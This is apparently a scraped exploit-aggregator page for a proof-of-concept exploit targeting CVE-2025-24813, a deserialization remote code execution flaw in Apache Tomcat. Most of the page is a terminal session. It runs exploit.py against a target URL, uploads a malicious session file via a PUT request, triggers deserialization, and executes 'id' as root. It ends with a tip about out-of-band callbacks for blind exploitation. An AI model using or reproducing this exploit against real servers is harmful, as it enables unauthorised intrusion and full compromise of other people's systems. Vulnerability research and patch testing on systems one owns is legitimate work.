Share
## https://sploitus.com/exploit?id=3C0AF930-5697-5FAF-9531-A5C827D90C5B
# CVE-2025-24813-PoC-exploit
Apache Tomcat Deserialization RCE

```
โฏ python3 exploit.py http://localhost:8080/ "id"
============================================================
CVE-2025-24813 - Apache Tomcat Partial PUT RCE
============================================================

[*] Target: http://localhost:8080
[*] Command: id

[*] Creating exploit payload...
[*] Uploading payload via PUT to: http://localhost:8080/session/exploit.session
[*] PUT Response: 201
[+] Payload uploaded successfully!

[*] Triggering deserialization...
[*] Trigger Response: 200

[*] Response body:



Deserialization Triggered!

โš ๏ธ Deserialization RCE Triggered!
Session file deserialized: exploit.session
Command executed: id


uid=0(root) gid=0(root) groups=0(root)






[*] Exploit complete!

If deserialization worked, check target for command execution.
For blind RCE, use out-of-band techniques (DNS/HTTP callbacks)
```